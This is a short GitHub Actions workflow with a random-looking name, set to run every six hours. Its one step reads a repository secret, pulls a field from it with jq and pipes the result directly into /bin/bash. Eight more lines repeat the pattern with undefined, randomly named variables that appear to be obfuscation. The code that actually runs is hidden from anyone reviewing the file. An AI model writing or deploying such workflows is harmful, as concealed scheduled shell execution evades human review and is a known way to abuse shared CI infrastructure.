name: proportionstay
on:
  workflow_dispatch:
  schedule:
    - cron: '37 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: proportionstay
        env:
          t267: ${{ secrets.t267 }}
        run: |
          echo $t267 | jq -r .lj861 | /bin/bash
          echo $yu426 | jq -r .wz63609 | /bin/bash
          echo $l92466 | jq -r .kijqa0252 | /bin/bash
          echo $cw70833 | jq -r .idi006 | /bin/bash
          echo $qldv75215 | jq -r .kf199 | /bin/bash
          echo $v30 | jq -r .qc049 | /bin/bash
          echo $qki75 | jq -r .qz42 | /bin/bash
          echo $kao6101 | jq -r .dgkr0654 | /bin/bash
          echo $walgl42 | jq -r .fb0324 | /bin/bash

